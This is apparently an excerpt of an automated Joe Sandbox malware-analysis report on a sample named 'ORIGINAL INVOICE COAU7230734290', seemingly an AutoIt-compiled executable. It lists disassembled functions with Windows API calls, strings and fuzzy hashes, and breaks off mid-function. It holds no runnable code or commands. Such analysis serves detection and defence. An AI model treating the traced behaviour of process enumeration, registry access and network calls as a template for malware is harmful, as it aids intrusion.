                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002308F2
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00230918
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0023091B
                                                              • SysAllocString.OLEAUT32(?), ref: 00230939
                                                              • SysFreeString.OLEAUT32(?), ref: 00230942
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00230967
                                                              • SysAllocString.OLEAUT32(?), ref: 00230975
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 46ad67cd2e4f77e302514ff5a271b9af45f92387c4c03e7238de84a41ee84b94
                                                              • Instruction ID: 5e8907e6b726457426aadedb1d6da20c801c86f38dd69351256e492c8f8d4b0a
                                                              • Opcode Fuzzy Hash: 46ad67cd2e4f77e302514ff5a271b9af45f92387c4c03e7238de84a41ee84b94
                                                              • Instruction Fuzzy Hash: 0521B2B2610209AFEB109FA8DC98EAB73BCEF08760B408525F909DB151D670EC418B60
                                                              Function 00232472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                              • API String ID: 1038674560-2734436370
                                                              • Opcode ID: 348c24e2e25c4726ee6bf25569298ef9b1f19f5ded5926e8c5691a3b97c617ff
                                                              • Instruction ID: 06121bfc3e623847c47bae42c79d103f7faab91a358d545c7c823754f827b05e
                                                              • Opcode Fuzzy Hash: 348c24e2e25c4726ee6bf25569298ef9b1f19f5ded5926e8c5691a3b97c617ff
                                                              • Instruction Fuzzy Hash: E9216DB2230212A7D724AA349C12EB773A8EF65300F904025F545A70C2E6A19ABAC794
                                                              Function 00230986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002309CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002309F1
                                                              • SysAllocString.OLEAUT32(00000000), ref: 002309F4
                                                              • SysAllocString.OLEAUT32 ref: 00230A15
                                                              • SysFreeString.OLEAUT32 ref: 00230A1E
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00230A38
                                                              • SysAllocString.OLEAUT32(?), ref: 00230A46
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: ca5da3f5f0d1a3dcc99c927b0739bf3b59d2f512947e8fbe2189346084abe48b
                                                              • Instruction ID: 4e9e3938e87c30bebdc8065ffe984e2526100b77934db34e0498b3877c6b7c84
                                                              • Opcode Fuzzy Hash: ca5da3f5f0d1a3dcc99c927b0739bf3b59d2f512947e8fbe2189346084abe48b
                                                              • Instruction Fuzzy Hash: D8215875610205AFDB10DFA8ECD9D6B77ECEF08360B448125FA09CB2A1D674EC918B64
                                                              Function 0025A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020D1BA
                                                                • Part of subcall function 0020D17C: GetStockObject.GDI32(00000011), ref: 0020D1CE
                                                                • Part of subcall function 0020D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0020D1D8
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0025A32D
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0025A33A
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0025A345
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0025A354
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0025A360
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: 979578116868e0d299a6c23c059eff34d52c9a9654c71c07e140d3a0957e8c20
                                                              • Instruction ID: 45c2043ba0e6d47afa087374366acd0990000c74d150092d90ac813b97ee355a
                                                              • Opcode Fuzzy Hash: 979578116868e0d299a6c23c059eff34d52c9a9654c71c07e140d3a0957e8c20
                                                              • Instruction Fuzzy Hash: 9311D3B1110219BEEF105F60CC86EE77F6DFF09398F014214BA08A20A0C6729C21DBA4
                                                              Function 0020CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 0020CCF6
                                                              • GetWindowRect.USER32(?,?), ref: 0020CD37
                                                              • ScreenToClient.USER32(?,?), ref: 0020CD5F
                                                              • GetClientRect.USER32(?,?), ref: 0020CE8C
                                                              • GetWindowRect.USER32(?,?), ref: 0020CEA5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Rect$Client$Window$Screen
                                                              • String ID:
                                                              • API String ID: 1296646539-0
                                                              • Opcode ID: c775588eb7387fb403b04c0e2fd12914800bef092c0d2fc1de83b06b3c9fae44
                                                              • Instruction ID: 53dde4334a6114064250935e796ab585ea66cd3d84bad8e2b9f2a2b8d3424750
                                                              • Opcode Fuzzy Hash: c775588eb7387fb403b04c0e2fd12914800bef092c0d2fc1de83b06b3c9fae44
                                                              • Instruction Fuzzy Hash: CAB15CB992024ADBDF10CFA8C4847EDB7B1FF08310F248669EC59EB251DB70A960DB54
                                                              Function 00251BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00251C18
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00251C26
                                                              • __wsplitpath.LIBCMT ref: 00251C54
                                                                • Part of subcall function 00211DFC: __wsplitpath_helper.LIBCMT ref: 00211E3C
                                                              • _wcscat.LIBCMT ref: 00251C69
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00251CDF
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00251CF1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID:
                                                              • API String ID: 1380811348-0
                                                              • Opcode ID: fa5339a1fc0314f51520fa05bb4f92881346306c1669e8f3e5581137b6068a58
                                                              • Instruction ID: 7a3bd23808998d55247fc229a48078b08e629623a244f3063f885de0139468bf
                                                              • Opcode Fuzzy Hash: fa5339a1fc0314f51520fa05bb4f92881346306c1669e8f3e5581137b6068a58
                                                              • Instruction Fuzzy Hash: 90517E711143049FD720EF24D885EABB7E8EF88754F00491EF98A97292EB70D958CB92
                                                              Function 00252FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00253C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00252BB5,?,?), ref: 00253C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002530AF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002530EF
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00253112
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0025313B
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0025317E
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0025318B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                              • String ID:
                                                              • API String ID: 3451389628-0
                                                              • Opcode ID: ade28fc10695a7f497a9389d76e2dc40b2ef8aec3f52db39fa01179058f900c3
                                                              • Instruction ID: b4241d41dd595ed658c0a50ee4b957bc0d03e325db43fb233d90f4386bc2887c
                                                              • Opcode Fuzzy Hash: ade28fc10695a7f497a9389d76e2dc40b2ef8aec3f52db39fa01179058f900c3
                                                              • Instruction Fuzzy Hash: 5B515A31214304AFC700EF64C885E6ABBF9FF88354F04891DFA55972A1DB71EA19CB92
                                                              Function 002584DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 00258540
                                                              • GetMenuItemCount.USER32(00000000), ref: 00258577
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0025859F
                                                              • GetMenuItemID.USER32(?,?), ref: 0025860E
                                                              • GetSubMenu.USER32(?,?), ref: 0025861C
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0025866D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: d664ed3551d68688a55dc20a8e69b37241fca581b10d4a0f016ee249e1678f3d
                                                              • Instruction ID: f1573c4427ce28d3b43f5d10dc6d16bc2306c6821e7065e34cf9b958ace01692
                                                              • Opcode Fuzzy Hash: d664ed3551d68688a55dc20a8e69b37241fca581b10d4a0f016ee249e1678f3d
                                                              • Instruction Fuzzy Hash: 2B519C71A10219AFCB11EF64C845AAEB7F8EF48310F114459ED05BB351DBB0AE558F94
                                                              Function 00234AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00234B10
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00234B5B
                                                              • IsMenu.USER32(00000000), ref: 00234B7B
                                                              • CreatePopupMenu.USER32 ref: 00234BAF
                                                              • GetMenuItemCount.USER32(000000FF), ref: 00234C0D
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00234C3E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                              • String ID:
                                                              • API String ID: 3311875123-0
                                                              • Opcode ID: 623d8b345f26fa97c965e66df3dfb362755e9ccb13ca50a9dca59a8966119d2e
                                                              • Instruction ID: 55c729307005a836476e0bad5f25b6ea8e1d770ea6dfd512e1eba71ba9a85f4a
                                                              • Opcode Fuzzy Hash: 623d8b345f26fa97c965e66df3dfb362755e9ccb13ca50a9dca59a8966119d2e
                                                              • Instruction Fuzzy Hash: C251E3F0A2130ADFCF20EF64D888BADBBF5AF44318F14459AE4559B291D3B0E964CB51
                                                              Function 00248DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0028DC00), ref: 00248E7C
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248E89
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00248EAD
                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00248EC5
                                                              • _strlen.LIBCMT ref: 00248EF7
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248F6A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_strlenselect
                                                              • String ID:
                                                              • API String ID: 2217125717-0
                                                              • Opcode ID: 2dc3e2ad2f01f17b3366be9414a3bbac3f75565f5c9a986439a9bd83e86be423
                                                              • Instruction ID: f00ce0f2174dc78260a112c2df566279b4d29681c1c274203e1de981c02ddb6d
                                                              • Opcode Fuzzy Hash: 2dc3e2ad2f01f17b3366be9414a3bbac3f75565f5c9a986439a9bd83e86be423
                                                              • Instruction Fuzzy Hash: 2A41E571620108AFCB18EFA4DD86EAEB7B9EF18310F104659F51A972D1DF70AE54CB60
                                                              Function 0020ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • BeginPaint.USER32(?,?,?), ref: 0020AC2A
                                                              • GetWindowRect.USER32(?,?), ref: 0020AC8E
                                                              • ScreenToClient.USER32(?,?), ref: 0020ACAB
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0020ACBC
                                                              • EndPaint.USER32(?,?,?,?,?), ref: 0020AD06
                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0026E673
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                              • String ID:
                                                              • API String ID: 2592858361-0
                                                              • Opcode ID: 4cbfd155e4aa8d73523ece94e094011834b4e3c38fdf3f75dcd63ae362a5cc20
                                                              • Instruction ID: 0db6667e3dea717195874b70cfc3e5282cedef092c2206282f56954f749055bd
                                                              • Opcode Fuzzy Hash: 4cbfd155e4aa8d73523ece94e094011834b4e3c38fdf3f75dcd63ae362a5cc20
                                                              • Instruction Fuzzy Hash: 3B41B0711103019FD710DF24EC88FB67BBCEF59320F140269F9A8862E2C371A8A4DB62
                                                              Function 0025E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(002B1628,00000000,002B1628,00000000,00000000,002B1628,?,0026DC5D,00000000,?,00000000,00000000,00000000,?,0026DAD1,00000004), ref: 0025E40B
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0025E42F
                                                              • ShowWindow.USER32(002B1628,00000000), ref: 0025E48F
                                                              • ShowWindow.USER32(00000000,00000004), ref: 0025E4A1
                                                              • EnableWindow.USER32(00000000,00000001), ref: 0025E4C5
                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0025E4E8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 9fceb02c16a4326626c69af85b78a073b0a8a766e36384bfda4f2d63d1373834
                                                              • Instruction ID: 571ebd27bff766ab89ab263f49dc2ecc7935b48023adc3cba20721ffcf4f204f
                                                              • Opcode Fuzzy Hash: 9fceb02c16a4326626c69af85b78a073b0a8a766e36384bfda4f2d63d1373834
                                                              • Instruction Fuzzy Hash: 04418E30610142EFDF29CF24D489B947BE1BF09306F1941B9EE5C8F1A2C731A999CB64
                                                              Function 002398BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 002398D1
                                                                • Part of subcall function 0020F4EA: std::exception::exception.LIBCMT ref: 0020F51E
                                                                • Part of subcall function 0020F4EA: __CxxThrowException@8.LIBCMT ref: 0020F533
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00239908
                                                              • EnterCriticalSection.KERNEL32(?), ref: 00239924
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0023999E
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002399B3
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 002399D2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 2537439066-0
                                                              • Opcode ID: afa51494e53912b6e895f9f7f779490b648f728facdd1d51ca4a3f786d81ca35
                                                              • Instruction ID: 1c77b46de69105119fa7d632260f7747e74f40160210283a5083bced35942d49
                                                              • Opcode Fuzzy Hash: afa51494e53912b6e895f9f7f779490b648f728facdd1d51ca4a3f786d81ca35
                                                              • Instruction Fuzzy Hash: E431A371900205EBDB10EF94DD89E6FB778FF45310F1440A9F909AB286D770DA64CB60
                                                              Function 00249B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,002477F4,?,?,00000000,00000001), ref: 00249B53
                                                                • Part of subcall function 00246544: GetWindowRect.USER32(?,?), ref: 00246557
                                                              • GetDesktopWindow.USER32 ref: 00249B7D
                                                              • GetWindowRect.USER32(00000000), ref: 00249B84
                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00249BB6
                                                                • Part of subcall function 00237A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00237AD0
                                                              • GetCursorPos.USER32(?), ref: 00249BE2
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00249C44
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              • Opcode ID: d3b89df94cbe1a54338441d6db46106418a1bf4b09e7ea7260cd4931fb4570bf
                                                              • Instruction ID: 2cf3fbde2099a63c12f2fb662a10d49b6349d3528724e92c5f8e64eb518aab97
                                                              • Opcode Fuzzy Hash: d3b89df94cbe1a54338441d6db46106418a1bf4b09e7ea7260cd4931fb4570bf
                                                              • Instruction Fuzzy Hash: 2831C1B210430AABC724DF18E849F9BB7E9FF89314F00091AF589E7181D671E954CB92
                                                              Function 0022AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0022AFAE
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0022AFB5
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0022AFC4
                                                              • CloseHandle.KERNEL32(00000004), ref: 0022AFCF
